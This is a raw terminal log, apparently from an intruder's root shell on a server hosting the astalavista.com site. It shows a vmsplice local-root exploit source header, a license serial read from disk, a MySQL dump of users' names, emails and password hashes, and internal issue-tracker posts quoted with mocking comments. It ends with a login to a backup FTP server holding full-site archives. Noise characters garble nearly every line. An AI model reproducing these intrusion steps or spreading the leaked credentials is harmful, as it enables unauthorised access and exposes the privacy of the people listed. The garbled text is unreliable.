% ^, X' [# ~5 ^' Z; [3 i9 P- ]drwx—— 2 com com 4096 Jun 4 04:04 backups% u9 i6 s. A6 s7 y; i, y6 ~9 P9 W
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
7 z2 j2 F' g* G( `( |drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system) } l" U P- j' v7 H' B
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
7 h0 t9 p5 c# J6 h-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout; f3 d5 z# Y+ Z' g B4 i' ^3 @) Z
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
' A5 }- D% r5 R6 [% t0 {-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
! b: }4 s F7 Gdrwx–x–x 3 com com 4096 Jan 29 2008 domains6 H3 H1 V# w' B: Z( q( y
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed5 H( `# Y7 p" S' e) R5 y/ I' B0 G
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap+ g* [$ ^7 x/ Z" i) r, l% t
-rw——- 1 com com 69 Nov 18 2008 .lesshst
9 m+ g0 ]) l2 e5 \; w! ]8 l. F9 [drwx—— 2 com com 4096 Sep 24 2007 mail* ?# m% D7 l4 E- S
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
, Q( o4 {& z' ?+ C) f4 T0 C" hdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
& |! D% G5 p& X2 c. ]; H4 klrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
' S i1 F, z# k. z7 f' [-rw-r—– 1 com mail 34 Sep 24 2007 .shadow- o# A# E3 m' x+ t% n5 F! Q
drwx—— 2 com com 4096 Aug 26 2008 .ssh
9 z, z% p3 a' p/ ]# D9 Q-rwx—— 1 com com 8515 Feb 10 2008 t
4 j3 |( n" Q/ I$ O! u-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c7 R7 ]% M [$ ~! S1 z4 k
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp6 ~" }' M2 o2 [( X7 B
-rw-rw-r– 1 com com 617 May 20 2008 .toprc8 n# e- ~! { p+ d, n+ g( U, V
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql; y) F2 Z, R6 N! w1 B b% B3 Y
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo+ @/ _ E0 x* I
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
3 K4 Y$ H% g4 }/ l- @: r0 S( k5 D" e4 [% o/ }
sh-3.2# head t.c
, ]/ K# w# f6 {" I/* U% r$ R( c) G
* jessica_biel_naked_in_my_bed.c% T; D0 m, w5 `; f9 q
*# X% o0 |. W+ |3 S1 s4 C) ^! G6 D
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.5 R" | H% g, o2 H% T0 r* d
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.6 j9 b% k- K; ~# _/ e$ E
* Stejnak je to stare jak cyp a aj jakesyk rozbite.( u( O0 Z' T% v( {
*
( j- _, s$ ^2 A7 h6 O* Linux vmsplice Local Root Exploit# r& l, G9 ]; H& x) U5 A. r0 }
* By qaaz
: ]# i2 ]0 p o*
# w( `$ s- g" _2 K2 {! N
- i: v& P/ V3 _' k2 {/ h" \( d! psh-3.2# cd /+ {5 u5 C# F0 k( j. D: [1 @! r: k
sh-3.2# ls -la( W0 C: ]# E9 V6 {! W. d8 r
total 360
5 i; s. i" \. {; T6 T7 R% F gdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
, T& P4 G# H( S, D- fdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
1 X* j: X; @+ l; H& w( H-rw——- 1 root root 10240 Jun 3 02:39 aquota.group* p( [' S4 \# D
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
4 x) h H3 y4 \$ g+ a& r, s-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db Z$ c( ]" L! V& v3 p* X) o
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
% z) t3 `6 o5 n6 v; u1 @-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel' R, u% S. h* o* d: G+ W
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup8 E$ Y& O3 [0 l& \: R
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
+ H# _/ U+ i, V$ V9 h+ }drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
& o! K. B7 H0 N5 X% q3 H; b% E* vdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev: R! h: z, b2 s3 w' P( C' ?9 F, ?
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc1 i8 I+ _' v6 ~! K9 E/ g% B
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home& j9 ]1 X0 l; \, W
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
# A/ J, Y. ~* q: K; B5 W! Idrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
, g# Q' ^( a- N" Y1 L6 Jdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
7 w: ]8 K0 Q8 Y: h0 m2 J2 D5 f. ~drwx—— 2 root root 16384 Sep 11 2007 lost+found
3 R3 t+ W; u% e9 ?1 Ldrwxr-xr-x 2 root root 4096 Mar 11 17:56 media' o! o3 G# j6 ?/ }& H2 v) q
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
6 ^# x- Q G! adrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
8 a$ v8 U$ z$ y" ^-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg3 Y6 e8 f/ I- n+ m7 z' a* U+ |
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
* K9 o! d3 z4 t& R6 K. P- j- Vdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
u! G* q5 [, }% V* S5 s- l# W/ Q! ?dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
7 f; c3 ~. g& K" V1 u. l! J1 s F& Kdrwxr-x— 15 root root 4096 Jun 4 08:40 root! ^9 V5 d7 y. E1 e0 v+ a: x5 L6 P
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
4 e/ I3 ?3 l7 ^. d2 W5 `. ^7 cdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux$ G2 L: Z+ q% A6 l
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
7 ~5 Q! W4 n& w# n9 H' x9 ]drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
; q- y* t. v, d' ydrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
. `' ~* f `4 q* Sdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
* r5 c) \0 K( t0 {1 pdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var/ |( ^5 G" n5 J( O- [, N
( G- k- _/ `3 q( }
sh-3.2# cd opt
) y: C; R/ z& w- s9 u: xsh-3.2# ls -la
! g$ C; j% `5 }* d" ytotal 20. ? Y; R3 O, |- q
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
4 t) X2 [2 N; `. ?+ i% W2 i) k: sdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..7 c3 k* s! L, j
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws$ h! M1 K. R8 [! ?$ B. N
3 c C3 y2 q, N6 I+ T9 v& j- ?% ]/ S% W
sh-3.2# cd lsws/
) A, b: h& Q3 \6 u8 z4 t; x5 V& Msh-3.2# ls -la
; r1 v& S _& H# z/ htotal 108
+ Q2 b0 F P# P5 Pdrwxr-xr-x 15 root root 4096 Mar 20 2008 .: Z# h$ O8 h- c% M' f
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..* r* r) [/ O5 Z
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons2 f! [6 B8 h0 J
drwxr-xr-x 13 root root 4096 May 29 15:10 admin' x! F0 Y" E( D/ j4 l& M" @
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
4 }# A; F1 S I3 E) k6 c% Z; qdrwxr-xr-x 2 root root 4096 May 29 15:10 bin
1 {1 b" F# u6 E: ?( S& gdrwx—— 4 apache apache 4096 Jun 3 02:43 conf7 t0 y0 V) l2 \: ?
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT; K9 }4 v3 q/ x. s6 N. W
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
. _% U' w7 }& X: ?3 Mdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin" r5 G7 A) y# m2 \1 |8 A
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
+ K$ p2 w0 G0 z, t! e; v* O-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
2 N. t" E, F+ N4 @& y. t-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
) ]& {* v+ z. o7 T& _) K-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL/ B$ l$ I! x$ A' A' T, A/ r
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP7 m) J$ z1 Y' a$ V3 w* B+ Y
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
& W; T4 B2 q) ^8 @- Mdrwxr-xr-x 2 root root 4096 Mar 20 2008 php
) R; Z/ N+ y' E4 n4 c8 @4 Ndrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
0 {: f" o( v, h% hdrwxr-xr-x 3 root root 4096 Mar 20 2008 share/ l0 b4 S1 u" c; Q+ b
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
1 S; Y1 D2 T( m1 a% k3 m7 |' D3 T; B" }* Z6 {
sh-3.2# cd conf) j# D0 z0 t7 L* |- {9 q; A. w
sh-3.2# ls -la
8 S/ y$ w! R+ p3 u9 t' Z' Ztotal 48% H6 d& M2 m+ E) f* z7 F
drwx—— 4 apache apache 4096 Jun 3 02:43 .! E9 s8 f/ i9 r: h2 n0 w
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
+ m) B$ w' A! Q: V0 S8 e+ |& kdrwx—— 2 apache apache 4096 Mar 20 2008 cert" Q% j' a' e9 f3 }
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml/ ^: j! s9 B+ T( N. [
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
& `9 S. Y* l4 U+ c; A% f-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
% {7 D! F( R( h" |5 G+ G: r9 C# O-rw——- 1 apache apache 256 May 29 15:10 license.key# x! M" d! s/ u! B
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
0 u' c8 j$ @ h-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties$ e! C! T: d+ b
-rw——- 1 apache apache 20 May 29 15:10 serial.no! f7 w/ J: ?5 \- @( K% u: p: y
drwx—— 2 apache apache 4096 Mar 20 2008 templates$ _) \) `- d" s
0 @% d+ h3 k# W. i
sh-3.2# cat serial.no
6 x/ c- @6 T4 C3 Q3 q2 Y. f, jIbDl-oVsO-CKqL-wVRa6 j& w( i5 w3 W, @ l' e) B
* q1 o! Q7 p) q4 Qsh-3.2# mysql( ^+ F: I) }' p1 r& Y5 G
Welcome to the MySQL monitor. Commands end with ; or \g." R) E0 Z0 n- G* S) T7 x
Your MySQL connection id is 286844
1 `. q( o B& ?0 R( M: |Server version: 5.0.45-community-log MySQL Community Edition (GPL)
0 e) {; e% x2 w& Q+ j3 Z/ @, m$ N1 z7 W! R
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.6 q* ~: o* }" {8 [1 q5 M0 o
- D: ^; ]; A% rmysql> show databases;' c' G) j+ A/ M! V3 F
+———————–+) h2 s+ k( _; X
| Database |
g4 e; P* J* h( N4 b( [+———————–+! W* c! q3 J9 E+ N8 a
| information_schema |- @ `( u4 h$ O {# p5 b
| astanet_ads |
Y& j/ d! \' z4 q) y; [3 @( d3 E| astanet_mailing_lists |7 \$ y) s( \& C& [
| astanet_mediawiki |
8 w. t* h1 E4 \: U7 b8 m" \| astanet_membersystem |6 N- i& _. s( ]/ A2 K* _3 f
| com_contrexx |; I x( z' b5 S" R
| com_contrexx2 |( |" q# p R# [8 O1 A1 @% s/ B
| com_contrexx2_live |
# K: C2 Q4 [1 d| da_roundcube |8 ^6 d [1 _* p( r
| dolphin |
* H3 O) b- S: ?# A3 A| ideapool |" i& D" z" x4 h
| mysql |
( w5 c3 v3 |* |7 M3 c- E% S0 ^0 F| test |
( _! X4 }+ e1 {3 ?3 ~| yourmaster |
3 n; j* \" V. B: l% @4 w+———————–+
% E8 O! a' V/ c; y1 X7 {& {0 t14 rows in set (0.00 sec)! l/ x' X8 C9 l+ u: Q
! L7 Y/ n8 o" N9 [' Y8 ]mysql> use ideapool& ^3 X, ?9 y8 R# A8 @- S
Database changed
. ?+ u+ n9 G$ Imysql> show tables;
$ |9 R9 G$ U9 J+———————————–+
! E# h u5 D# B" y* G| Tables_in_ideapool |
& w4 `7 D( J0 ~" c+———————————–+. @. O4 S) \! S5 z% l* h" d8 c
| eventum_columns_to_display |
8 K5 e, j* S* E/ ?' T. n* n| eventum_custom_field |
; y. w% r9 }3 ~& Z| eventum_custom_field_option |
7 Z* {/ j' c2 ~! Z! j| eventum_custom_filter |
$ E; n | K5 Y) K7 w& Z| eventum_customer_account_manager |/ ^1 v/ t& N' q/ F9 g7 i: n) ^- d
| eventum_customer_note |
) \+ p: d1 ?4 [7 c# B| eventum_email_account |
) X; \ z, x0 o* J5 s; ~/ ^| eventum_email_draft |3 \) n" R/ e4 }) Q8 a$ b5 G
| eventum_email_draft_recipient |
0 S% O4 ^* Q+ A( F& ]| eventum_email_response |
7 ^ h# a% L1 ]: E/ F& N| eventum_faq |9 G! F. B% e1 o* m/ v
| eventum_faq_support_level |6 t& T8 N0 p5 Q% r+ I/ z9 `0 e
| eventum_group |# c6 J4 o; M; B7 \! |0 K
| eventum_history_type |0 o) z1 _1 O9 ]: v7 c5 w. F3 A" \
| eventum_irc_notice |8 _* c. T& Z6 v0 x% E9 w% L8 `+ \
| eventum_issue |
O+ ~- u3 o1 `4 i& N; |+ |, d| eventum_issue_association |) v4 W% k# L' F6 D
| eventum_issue_attachment |
/ i2 Y0 T' j3 r# T3 @) [| eventum_issue_attachment_file |
) @& w# |; _, E# l( b' ^| eventum_issue_checkin |% p. E |4 q* |& ^% n
| eventum_issue_custom_field |
* G, }# E6 J0 }% [2 L/ O, t| eventum_issue_history |
0 r7 D" s9 ?. F5 \) P5 G! g| eventum_issue_quarantine |4 q3 u9 Z! h5 p; b! ]3 M
| eventum_issue_requirement |
0 c3 X1 B6 U# u, s3 v| eventum_issue_user |+ s9 N4 T- y/ }6 k! b% H
| eventum_issue_user_replier |* f$ G2 D( s! t8 b3 k. ?
| eventum_link_filter |
% p1 V% n: X& K; O* J+ ]| eventum_mail_queue |. h; d# m* m1 v0 w( C
| eventum_mail_queue_log |
# w) |6 A& [* i| eventum_news |- X" n+ E: Q& i0 i# q- t8 p% M& p
| eventum_note |/ m1 r' Z, k- o* I& Z! h) ]
| eventum_phone_support |
2 W& [0 O& Y0 ~* k| eventum_project |
; z7 s* f4 ]) m$ v3 k' l| eventum_project_category |3 q1 o; D% l* i2 ?- ?
| eventum_project_custom_field |& |( g' r, h7 k& G0 V& C* r0 _
| eventum_project_email_response |
/ Y* D. R! V# Q# K; [. ^| eventum_project_field_display |* M! x' P: e9 ]% e+ S0 J
| eventum_project_group |
0 j6 I) Q( c5 S* B| eventum_project_link_filter |
6 O' s+ ?( G' p2 J4 z1 S| eventum_project_news |) _9 e9 C R; f8 }6 `1 g' b2 n, Y
| eventum_project_phone_category |: H4 K8 Z) j2 q* k9 i
| eventum_project_priority |
1 A/ N3 I' R3 @$ I3 x2 K| eventum_project_release |7 x3 c) V1 \% p2 y
| eventum_project_round_robin |; [7 n8 W1 D- X) g9 O
| eventum_project_status |5 D. W' q6 D l/ }
| eventum_project_status_date |
8 e6 \& F, h7 ~* _5 G| eventum_project_user |% | Z8 p7 g& G; h
| eventum_reminder_action |
: J. g8 g! L4 K+ z J; }| eventum_reminder_action_list |
) T: ?$ c+ `" X2 H' k2 m0 s% ~, k| eventum_reminder_action_type |" `: F; u6 h6 i$ p8 ?* e- m2 g5 Q
| eventum_reminder_field |
( @: t. k; _: O) B( w. o| eventum_reminder_history |( n1 a# s/ {2 R* M" [- {
| eventum_reminder_level |8 v$ L7 X y# N E
| eventum_reminder_level_condition |
* l/ z' a0 _: u3 y| eventum_reminder_operator |
6 Z( t$ t% J. q$ U/ Z0 I2 E| eventum_reminder_priority |
1 D* N+ L) U! p A| eventum_reminder_requirement |
# S' A, t& l) a% Q| eventum_reminder_triggered_action |
) e: Q% ?0 t: M$ u5 m- N| eventum_resolution |
p t6 t6 }! N+ d6 \+ ]5 e+ || eventum_round_robin_user |
: z$ ]! |6 s3 p! [- N| eventum_search_profile |
% O }$ o' u# d: _& q$ J2 J- |: H6 B| eventum_status |: F, y' M, u! {" \( L
| eventum_subscription |; W; r- O3 w+ _. M
| eventum_subscription_type |
* W0 S7 Z. U. N8 l( {| eventum_support_email |
0 @) H: u- q) z; ~9 t| eventum_support_email_body |2 p, u1 ] M, b
| eventum_time_tracking |
+ ]+ i- F% b. u K; g0 j| eventum_time_tracking_category |
( f6 E- a2 B/ M! t, P, o- o| eventum_user |
- `$ r) r8 J( j* J% \# Z+———————————–+
( P8 F+ f: A9 \9 v69 rows in set (0.00 sec)3 G( O0 `+ b& `. v% f# i# ?$ O9 w$ ]
$ O [, n4 m' |, r }4 }
mysql> describe eventum_user;
: h3 F7 Z) v* x. e+————————-+——————+——+—–+———————+—————-+
4 C' X& F* x, {- s6 u| Field | Type | Null | Key | Default | Extra |
, K. o! j+ D6 D( U: m+————————-+——————+——+—–+———————+—————-+
* z; o3 u8 Q; w& C0 W8 y| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
( |' [. g4 A9 g0 k. r; f| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |1 I; n. O" r! P! w) Y% D1 |' f
| usr_customer_id | int(11) unsigned | YES | | NULL | |
' w) u% G2 Q6 U' [" H* W+ H9 O| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
, W( s t W/ h4 M7 @, \| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |8 h: y3 h% ] u3 n$ Z
| usr_status | varchar(8) | NO | | active | |9 e& M# i3 J' t: U! _
| usr_password | varchar(32) | NO | | | |9 P# _" l6 ~% _! E2 }
| usr_full_name | varchar(255) | NO | | | |! l8 w( K! A/ e1 A5 z% |
| usr_email | varchar(255) | NO | UNI | | |9 T1 j* |( e6 s" O% p* V8 G
| usr_preferences | longtext | YES | | NULL | |, ?" l/ ~# C- R& a% r: F5 Z1 G( k
| usr_sms_email | varchar(255) | YES | | NULL | |# U4 N* @* ]8 F9 D* j) u
| usr_clocked_in | tinyint(1) | YES | | 0 | |
4 _1 P) r- t* r/ c) M+ i| usr_lang | varchar(5) | YES | | NULL | |8 x9 t- R% G: v6 ]$ L& [
+————————-+——————+——+—–+———————+—————-+
2 h6 ?. v) E! n* |6 ?13 rows in set (0.00 sec)( ]+ s2 f F9 Y/ ~
1 v6 X$ o; L& L* }mysql> select usr_full_name,usr_email,usr_password from eventum_user;
# A* p2 a3 W O9 Z% Z+———————-+——————————-+———————————-+0 @. A6 z. L$ @5 S
| usr_full_name | usr_email | usr_password | o0 h$ C& ?; [) p N4 G9 m7 i& t
+———————-+——————————-+———————————-+
1 _0 `' X( U. H/ t+ k& }, O| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |! J% d6 I$ B, N, s9 l/ C
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
5 W- z/ Z, K, W, j+ X+ A; }# c' || Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
5 R9 i. j3 `6 m6 R$ k| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
# [7 P+ P" v1 i| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
$ z, z7 ?! y! x* z+ ]| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
* e7 [& N7 h, J5 o O M" M| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
, M; w8 K' e* s U {; j| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |) _% Z' f- V. @
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |% a8 R" y' x% r) H1 |$ E
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
" F% }; S! J r; m| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
; }, u% h. `+ R; ?8 e| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |' \! O$ O/ H) d! R6 k; u$ L
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
! ]1 O0 P( r2 r| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |; y" C$ Y* S# t3 o# Q
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |5 ?' ^# i$ c- l
+———————-+——————————-+———————————-+
" ^0 }8 y* y. ] T# z2 Z15 rows in set (0.00 sec)
# h Y. H' d# }. [6 ]1 @# t( \% A. v: n9 f* d
mysql> select iss_description from eventum_issue where iss_id = 43;
: f) Z9 w5 E+ t w2 u+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+6 z& A+ m" I4 L) C8 r
| iss_description 4 ~9 k2 h. M) H) A( L; [# n
|
0 S, z- w# t& }) X+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
$ q8 V7 H8 E, E| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be+ }2 r# |, \: w# K
connected for 90 mins… 120mins… so what i propose is something like:' T6 H+ m, c8 Y; o# \9 {
链接标记[url]http://www.surfthechannel.com/[/url]: O" ^4 a5 @$ T8 l# n% v
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system: R$ Y" ~* u8 H# ?. }
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
+ M( @' `1 [, d; X! Pbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
$ K$ M# a6 t5 `& R8 O$ x+ Rif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
5 k* n$ d& a n: C* C6 T2 [5 b# J, a* r/ k7 z- p
We could also put advertisement during play on the flash video player itself… extra $$…9 T8 I) w1 n ]4 t, t: ?3 n
' G8 w9 G8 g7 Y% r/ jBy sykadul |7 y& _2 G9 d' r0 z0 H0 J7 i5 p+ d R
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
1 v+ _3 b6 C: s1 c# i1 row in set (0.00 sec)- P7 X, g- D9 g( Y5 U P/ P
8 n' i& U* c J A+ J2 ^( [
// Money and extra $$ is all they care about. remember that.4 q& F, t/ G! e3 S
) t, E2 r) J( \! i% ]
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;2 C) K0 ^3 H; a/ ^' B
+————————+——————————————————————————————————————————————————————————————————————————————-+% o. I6 I4 l4 O6 E
| iss_summary | iss_description 3 o/ g8 |7 {( s# x% L
|
3 e! R0 T+ S8 V+————————+——————————————————————————————————————————————————————————————————————————————-+5 B0 q0 h: {6 [
| Forum for REAL EXPERTS | Hello,! ^4 M4 R: V4 l2 V
& g, F+ Q$ B+ ]& N2 `7 lIshtus and I, C; h K- I1 ?. o* v
* i9 n# m. z& KCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide5 A u( A1 }/ ^" f; R
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
/ ^0 v4 p# S+ _# k j6 y5 _2 F8 s- r0 ]4 x; t+ g4 u4 T* ?+ q
One example a friend of mine from coresecurity.com!
: h+ C- f7 r2 x0 X+ h4 j( Y8 Q5 t$ O& |+ R4 D5 w$ O
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..- T/ E& _7 n6 V- v6 m E! w
; Y9 }9 R9 w% I% Z
|% L3 K- A' [: Q; {
+————————+——————————————————————————————————————————————————————————————————————————————++ U; Y9 u5 P9 n+ Y% s! ~! L0 G+ y" s
1 row in set (0.00 sec)( `" @; b5 P2 T C% L; g
$ |* Z* V% ]. Y# _9 P// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
5 U- y& z- u$ r$ S2 D6 r& @, U x9 j b
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;& Q8 O, Z* b! j4 p
+——————+———————————————————————————————+7 K: L- a# |$ U( b+ _
| iss_summary | iss_description |; X. M2 }2 M; X
+——————+———————————————————————————————+
; [8 k4 q; S1 v& ]: `8 }. w8 b| Website guidance | Virtual Girl which guides you trought the website.
) F7 E% ^! c; K, I* z7 i' m# D# ~
& x, m, a% y2 f& C2 {) \3 MWe need a girl with who you can ( talk )!!!
/ D) y6 J4 ^* b$ qAlso for the News!
3 t* W5 F1 N7 [6 B/ YSo my suggestion is a girl who read you the news loud if you like!
7 j/ H+ G8 z' Q3 X0 _# |you can choose between read yourselfe or she read it for you or both!
) h& i7 w3 f6 \/ ` n) k
1 K8 t5 W; g' i4 X& g. KGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
; U9 _ h8 r6 B0 ^
5 [2 Y5 g, Y6 g% U! t* e* p9 v* w0 |Have a look on the example girls!!% T6 `3 J- c6 E4 t @, b+ B9 n
& J4 u6 X9 u7 J$ B3 j链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]" J! r3 e" O* Q
- z5 a1 m5 J7 T& G( `6 M
or that
# f: L$ D( M- y" |# g
3 Z# y% |. G! B ^& H1 `链接标记[url]http://www.yellostrom.de/[/url]
- ]' h, }8 J8 a3 p$ G0 u: b1 x; p* w( I2 T; p$ x2 j: M: B
|
" y" \9 t! z8 g! @6 c6 O8 e+——————+———————————————————————————————+
5 a& }7 b% r0 W y1 row in set (0.00 sec)
( h0 ^ r, h3 O0 d' F
/ _# x9 P) j* h( n* M// ha ha.
/ c# [8 {4 G0 {9 b* V5 f% _6 i8 @+ y& O E% j5 u$ v6 }
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
2 g v, }; c& s+————————–+———————————————————————————————————–+
- x0 J- b; V8 @1 P| iss_summary | iss_description |
% M+ ]! `: O. L% W: D+————————–+———————————————————————————————————–+
) H$ Y, j6 L3 e: ^: ]) X| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |1 Q9 o. O6 K7 b% \ t% k
+————————–+———————————————————————————————————–+
* u5 n+ } ]' [# V7 w1 row in set (0.00 sec)- v5 Y* L |2 p
/ t$ x0 ]$ `- o6 i, h7 Y
// LOL.
& m. o% |& N$ h# M9 }
+ g8 g# _* u! |' Nmysql> exit) h0 @, a# r1 J! a2 `( ^( x
Bye
* E9 y! Y, W3 q' H7 w4 r' ^. x2 O" B
sh-3.2# ftp 212.254.194.163
! ?5 S5 B2 Y q/ zConnected to 212.254.194.163.
0 I, C& A _0 x3 v220 BackupCOM_VW FTP server ready.8 w: F2 V; B' ~) ~2 D
504 AUTH: security mechanism ‘GSSAPI’ not supported.
7 @- h- L. @# a& ~- j504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.7 r& v# B- V: i1 {* j& Q7 d
KERBEROS_V4 rejected as an authentication type
: ?" V# s( g7 @$ R* b2 A9 p; NName (212.254.194.163:root): astalavista.com; l0 I) M2 P' h; D) r7 J1 o( e
331 Password required for astalavista.com.
4 c5 D0 A; a& D xPassword:
4 M% a: t& U" ]* X9 J+ T: k230 User astalavista.com logged in.( X5 L- c" y- J6 i
Remote system type is UNIX.+ @+ S* O! }" J
Using binary mode to transfer files.6 b/ H" l- N# J" s+ F! ]
ftp> ls -la
/ Z, _4 s! j$ ]1 Y0 Q8 K227 Entering Passive Mode (212,254,194,163,2,188)6 F6 O( Z) Q$ v; m+ E+ u
150 Opening BINARY mode data connection for ‘file list’.$ u$ }' O2 b6 p) ?" Y% d' F) k6 \' i
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com, k+ F$ P4 g1 z0 E: w) d
226 Transfer complete.* U! _* _8 }0 a$ s( `. W- c3 v
ftp> cd astalavista.com) ~# n0 Q6 i( ~; }9 |
250 CWD command successful.' T' Z; Q6 V I( P5 c% ?
ftp> ls -la
' F+ x6 s/ l- N, L) o227 Entering Passive Mode (212,254,194,163,2,189)
& I6 l1 s7 Z: Q/ X/ H/ q& Y1 C150 Opening BINARY mode data connection for ‘file list’.7 r" v9 `2 ^. `
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
. g9 G* B6 c" p-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz22 H! o9 l0 O' y: O0 \
